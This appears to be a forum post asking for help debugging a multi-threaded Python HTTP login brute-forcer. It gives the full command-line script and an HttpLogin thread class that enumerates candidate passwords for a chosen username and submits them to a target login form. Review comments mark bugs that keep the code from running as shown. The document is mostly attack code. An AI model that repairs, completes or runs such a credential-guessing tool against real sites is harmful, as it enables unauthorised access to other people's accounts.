I've built this brute-forcer in Python. It uses multi-threading to balance the work of sending multiple requests for each word length, with a maximum of N threads running simultaneously on a CPU with N cores.
The problem is that it doesn't seem to do anything: when it runs, it prints only the print statements in the main source file, but doesn't print the words as they are sent...
This is the main source file:
import argparse
import sys
import os
import threading
from HttpLogin import HttpLogin
def main(thread_pool, event):
    """Block until every worker in *thread_pool* has been joined.

    Anything raised while waiting on a worker sets *event*, after which the
    loop carries on with the next worker in the list.
    """
    for worker in thread_pool:
        try:
            worker.join()
        except:  # bare on purpose: this form also catches KeyboardInterrupt
            event.set()
# Command-line interface: six mandatory options, then optional settings for
# the character set, the length range, the HTTP method and extra body fields.
parser = argparse.ArgumentParser(
    description="A complete Http Bruteforcer by St3veR0nix",
)

required_group = parser.add_argument_group("required arguments")
required_group.add_argument(
    "-u", "--url",
    type=str,
    required=True,
    help="Set the target url",
)
required_group.add_argument(
    "-p", "--port",
    type=int,
    required=True,
    help="Port number",
)
required_group.add_argument(
    "-U", "--username",
    type=str,
    required=True,
    help="The Username to use for login",
)
required_group.add_argument(
    "-a", "--uri",
    type=str,
    required=True,
    help="A reference URI for knowing if the login was succesfull, like /example.php",
)
required_group.add_argument(
    "-up", "--user-parameter",
    required=True,
    help="The parameter for the user in http body request",
)
required_group.add_argument(
    "-pp", "--pass-parameter",
    required=True,
    help="The parameter for the password in http body request",
)

parser.add_argument(
    "-c", "--char",
    type=int,
    required=False,
    default=1,
    help="Character set: < 1 = a-z, 2 = 0-9, 3 = A-Z, 4 = a-z0-9, 5 = A-Z0-9, 6 = a-zA-Z0-9 >",
)
parser.add_argument(
    "-m", "--min",
    type=int,
    required=False,
    default=1,
    help="Minimum length of permutations, default=1",
)
parser.add_argument(
    "-M", "--max",
    type=int,
    required=False,
    default=1,
    help="Maximum length of permutations, default=1",
)
parser.add_argument(
    "-r", "--request-method",
    type=str,
    required=False,
    default="GET",
    help="The request method, GET or POST, default=GET",
)
parser.add_argument(
    "-b", "--body",
    type=str,
    required=False,
    default="",
    help="Additional http body parameters, must be like example=test or example=test&example2=test2 and so on",
)

args = parser.parse_args()

# Echo the effective settings before any worker is created.
print(f"Setting target URL to {args.url} on port {args.port}...")
print(f"Setting method of the request to {args.request_method}...")
# NOTE(review): this reports --max as the thread count, while the launch loop
# further down starts one worker per length from --min up to --max.
print(f"Setting {args.max} threads for permutations...")
print(f"\nStarting Bruteforce with username {args.username}")
# Building blocks for the selectable character sets.
_LOWER = "abcdefghijklmnopqrstuvwxyz"
_UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
_DIGITS = "0123456789"

# Maps the value of -c/--char to a list of single-character strings,
# in the same order as the help text: lower, digits, upper, then the mixes.
character_dictionary = {
    1: list(_LOWER),
    2: list(_DIGITS),
    3: list(_UPPER),
    4: list(_LOWER + _DIGITS),
    5: list(_UPPER + _DIGITS),
    6: list(_LOWER + _UPPER + _DIGITS),
}

# A --char value outside 1..6 raises KeyError here.
characters = character_dictionary[args.char]
# Start one HttpLogin worker per word length, from --min up to --max, and
# hand the whole pool to main() so the script waits for them.
thread_pool = []
event = threading.Event()  # shared by every worker and by main()

perm = args.min
for _ in range(args.max):
    if perm > args.max:
        break
    worker = HttpLogin(
        args.url,
        args.port,
        perm,
        characters,
        args.uri,
        args.user_parameter,
        args.pass_parameter,
        args.username,
        args.body,
        args.request_method,
        event,
    )
    # The guard above already ensures perm <= args.max, so every worker
    # that gets built is also registered and started.
    thread_pool.append(worker)
    worker.start()
    perm += 1

main(thread_pool, event)
And this is the HttpLogin class definition, saved as HttpLogin.py:
import threading
import requests
class HttpLogin(threading.Thread):
    """Thread that enumerates candidate passwords of one length for one username.

    The constructor stores the target, the character set, the form field
    names and a shared ``threading.Event``; ``run`` loops until that event
    is set.

    NOTE(review): the listing reached this page without indentation. The
    nesting below is reconstructed, and the three helper functions are placed
    inside the class because they read ``self`` - confirm against the
    original file.
    """

    # Class-level defaults. __init__ rebinds every one of these on the
    # instance except ``data``.
    host = ""
    port = 0
    perm = 0
    char_set= []
    URI = "/"
    user_p = ""
    passwd_p = ""
    username = ""
    http_method = "GET"
    event = threading.Event()
    body = ""
    # Never rebound per instance: __init__ only writes keys into it, so all
    # HttpLogin objects (one per thread) read and write this single dict.
    data = {}

    def __init__(self, host, port, perm, char_set, URI, user_p, passwd_p, username, body, http_method, event):
        """Store the settings and pre-fill the request fields.

        ``body`` is split on "&" and each piece on "="; the resulting
        name/value pairs are added to ``data`` next to the username field.
        """
        threading.Thread.__init__(self)
        self.host = host
        self.port = port
        self.perm = perm
        self.char_set = char_set
        self.URI = URI
        self.user_p = user_p
        self.passwd_p = passwd_p
        self.username = username
        self.http_method = http_method
        self.event = event
        self.body = body
        self.data[self.user_p] = self.username
        try:
            splitted_body = self.body.split("&")
            for s in splitted_body:
                try:
                    parameter = s.split("=")[0]
                    value = s.split("=")[1]
                    self.data[parameter] = value
                except:
                    # A piece without "=" (including the empty default body)
                    # raises IndexError above and is skipped without a message.
                    pass
        except:
            # NOTE(review): this fallback calls self.body.split again, so it
            # presumably fails the same way the outer try did - confirm.
            splitted_body = self.body.split("=")
            self.data[splitted_body[0]] = splitted_body[1]

    def run(self):
        """Repeat the enumeration until the shared event is set."""
        while not self.event.is_set():
            # Starting candidate: the first character repeated perm times.
            buf = self.char_set[0] * self.perm
            try:
                send_permutations(buf, len(buf), self.char_set)
            except:
                # Every exception from the call is discarded here, so a
                # failure inside it prints nothing and the while loop just
                # starts over.
                # NOTE(review): as laid out here, send_permutations is a
                # class-level def called by bare name, which would raise
                # NameError on every pass - the likely reason no candidate is
                # ever printed. Log the exception to confirm.
                pass

    # NOTE(review): the three functions below take no ``self`` parameter but
    # read ``self`` in their bodies, and they call each other by bare name.
    def send_permutations(buf, buf_l, char_set):
        """Recursively vary position ``buf_l - 1`` of ``buf`` over ``char_set``.

        Each variant is printed and submitted; a successful login sets the
        shared event.
        """
        i = buf_l - 1
        if i < 0:
            return
        for c in char_set:
            buf[i] = c
            print(buf)#, end="\r")
            try:
                res = sendlogin(buf)
                if isLogin(res) == True:
                    print("\n\nPassword Found! --> " + buf)
                    self.event.set()
            except:
                # Request and lookup errors are dropped without a message.
                pass
            # NOTE(review): placement inside the for loop is reconstructed.
            send_permutations(buf, buf_l -1, char_set)

    def sendlogin(password):
        """Send one login request carrying ``password`` and return the response.

        Returns None when ``http_method`` is neither "GET" nor "POST".
        """
        self.data[self.passwd_p] = password
        res = None
        # NOTE(review): reads self.url, but __init__ assigns self.host and
        # never uses self.port - confirm which attribute is intended.
        if self.http_method == "GET":
            res = requests.get(self.url, data=self.data)
        elif self.http_method == "POST":
            res = requests.post(self.url, data=self.data)
        return res

    def isLogin(res):
        """Return True if any response in ``res.history`` redirected to the reference URI."""
        for i in res.history:
            # NOTE(review): reads self.uri, but __init__ assigns self.URI.
            if i.headers['location'] == self.uri:
                return True
        return False
The program requires command-line parameters; if you would like to reproduce the problem on your own, you should comment out those lines or set some default values.